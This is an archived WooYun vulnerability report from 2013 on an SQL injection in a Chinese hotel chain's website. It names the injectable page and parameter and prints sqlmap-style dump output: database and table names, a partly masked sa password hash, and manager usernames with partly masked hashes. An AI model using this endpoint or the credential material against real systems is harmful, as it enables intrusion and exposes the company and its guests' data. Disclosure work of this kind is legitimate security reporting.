漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-039303
漏洞标题:连锁酒店#2 尚客优酒店SQL致大量用户信息泄露
相关厂商:尚客优连锁酒店
漏洞作者: 爱上平顶山
提交时间:2013-10-10 17:21
修复时间:2013-11-24 17:22
公开时间:2013-11-24 17:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-24: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
0.0
详细说明:
尚客优酒店
点:
http://www.thankyou99.com/shop-list.php?type=2&id=11
D:\wamp\www\4006168169\shop-list.php
-----------------------------------------------------
available databases [7]:
[*] api
[*] master
[*] model
[*] msdb
[*] Ota
[*] tempdb
[*] ThankSql
[*] sa [1]:
password hash: 0x01004086ceb606ef267d5dd2c1d6214b1f3c735f768dfe9***
header: 0x0100
salt: 4086ceb6
mixedcase: 06ef267d5dd2c1d6214b1f3c735f768df***
Database: api
[11 tables]
+--------------------+
| dbo.WebPrice |
| dbo.cdb_hotel |
| dbo.cdb_hotel_pic |
| dbo.cdb_hotel_type |
| dbo.cdb_hr |
| dbo.cdb_ip |
| dbo.cdb_manager |
| dbo.cdb_members |
| dbo.cdb_shop |
| dbo.cdb_shopaddre |
| dbo.cdb_shoplist |
+--------------------+
Database: api
Table: dbo.cdb_manager
[4 entries]
+-----+------------+----------------------------------+
| uid | username | password |
+-----+------------+----------------------------------+
| 1 | hrthankyou | 747acb68a5feafb16e25421bebb*** |
| 2 | lithank | ef36215b9c60d0e0757358f88ef*** |
| 3 | thankktv | 982661e3837afd59eafdcd3105f*** |
| 4 | thankyou | dd6435ff277c869bf69a47c3984*** |
+-----+------------+----------------------------------+
--------------------------------------------------------
Database: Ota
[85 tables]
+-------------------+
| dbo.B_Account |
| dbo.B_Fee |
| dbo.B_Guest |
| dbo.B_Pay |
| dbo.B_cardback |
| dbo.B_cardsell |
| dbo.Book |
| dbo.Book2 |
| dbo.Book_Account |
| dbo.Book_Fee |
| dbo.Book_Guest |
| dbo.CardClub |
| dbo.CardMake |
| dbo.CardType |
| dbo.CardXuFei |
| dbo.Class |
| dbo.Country |
| dbo.Customer |
| dbo.DRbook |
| dbo.DRczl |
| dbo.DRoth |
| dbo.DRroom |
| dbo.DRsr |
| dbo.DRuse |
| dbo.DRvag |
| dbo.Employee |
| dbo.GongGao |
| dbo.Goods |
| dbo.GoodsClass |
| dbo.GuestType |
| dbo.LockShop |
| dbo.LockStatus |
| dbo.Log |
| dbo.Log2 |
| dbo.ManageFee |
| dbo.Nation |
| dbo.Operator |
| dbo.Operator2 |
| dbo.PricePlan |
| dbo.PrintSet |
| dbo.Regedit |
| dbo.Regedit2 |
| dbo.Room |
| dbo.RoomType |
| dbo.RoomType2 |
| dbo.SQLField |
| dbo.SQLset |
| dbo.ShopInf |
| dbo.SpeFile |
| dbo.Stock |
| dbo.Svc_Area |
| dbo.Svc_City |
| dbo.Svc_County |
| dbo.Svc_Dept |
| dbo.Svc_Ota |
| dbo.Svc_Ota_Grab |
| dbo.Svc_Ota_Order |
| dbo.Svc_Province |
| dbo.Svc_RoomType |
| dbo.Svc_Shop |
| dbo.Svc_User |
| dbo.Svc_WebPrice |
| dbo.System |
| dbo.System2 |
| dbo.System3 |
| dbo.TBSource |
| dbo.TelGuest |
| dbo.TelHis |
| dbo.Verson |
| dbo.WebPort |
| dbo.WebPort2 |
| dbo.WebPrice |
| dbo.WebRoom |
| dbo.YuePeng |
| dbo.book_account2 |
| dbo.book_fee2 |
| dbo.book_guest2 |
| dbo.cdb_members |
| dbo.data |
| dbo.heige |
| dbo.sfz |
| dbo.sj |
| dbo.telShop |
| dbo.temp |
| dbo.webBook |
+-------------------+
ok
漏洞证明:
Database: Ota
[85 tables]
+-------------------+
| dbo.B_Account |
| dbo.B_Fee |
| dbo.B_Guest |
| dbo.B_Pay |
| dbo.B_cardback |
| dbo.B_cardsell |
| dbo.Book |
| dbo.Book2 |
| dbo.Book_Account |
| dbo.Book_Fee |
| dbo.Book_Guest |
| dbo.CardClub |
| dbo.CardMake |
| dbo.CardType |
| dbo.CardXuFei |
| dbo.Class |
| dbo.Country |
| dbo.Customer |
| dbo.DRbook |
| dbo.DRczl |
| dbo.DRoth |
| dbo.DRroom |
| dbo.DRsr |
| dbo.DRuse |
| dbo.DRvag |
| dbo.Employee |
| dbo.GongGao |
| dbo.Goods |
| dbo.GoodsClass |
| dbo.GuestType |
| dbo.LockShop |
| dbo.LockStatus |
| dbo.Log |
| dbo.Log2 |
| dbo.ManageFee |
| dbo.Nation |
| dbo.Operator |
| dbo.Operator2 |
| dbo.PricePlan |
| dbo.PrintSet |
| dbo.Regedit |
| dbo.Regedit2 |
| dbo.Room |
| dbo.RoomType |
| dbo.RoomType2 |
| dbo.SQLField |
| dbo.SQLset |
| dbo.ShopInf |
| dbo.SpeFile |
| dbo.Stock |
| dbo.Svc_Area |
| dbo.Svc_City |
| dbo.Svc_County |
| dbo.Svc_Dept |
| dbo.Svc_Ota |
| dbo.Svc_Ota_Grab |
| dbo.Svc_Ota_Order |
| dbo.Svc_Province |
| dbo.Svc_RoomType |
| dbo.Svc_Shop |
| dbo.Svc_User |
| dbo.Svc_WebPrice |
| dbo.System |
| dbo.System2 |
| dbo.System3 |
| dbo.TBSource |
| dbo.TelGuest |
| dbo.TelHis |
| dbo.Verson |
| dbo.WebPort |
| dbo.WebPort2 |
| dbo.WebPrice |
| dbo.WebRoom |
| dbo.YuePeng |
| dbo.book_account2 |
| dbo.book_fee2 |
| dbo.book_guest2 |
| dbo.cdb_members |
| dbo.data |
| dbo.heige |
| dbo.sfz |
| dbo.sj |
| dbo.telShop |
| dbo.temp |
| dbo.webBook |
+-------------------+
修复方案:
过滤。
版权声明:转载请注明来源 爱上平顶山@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝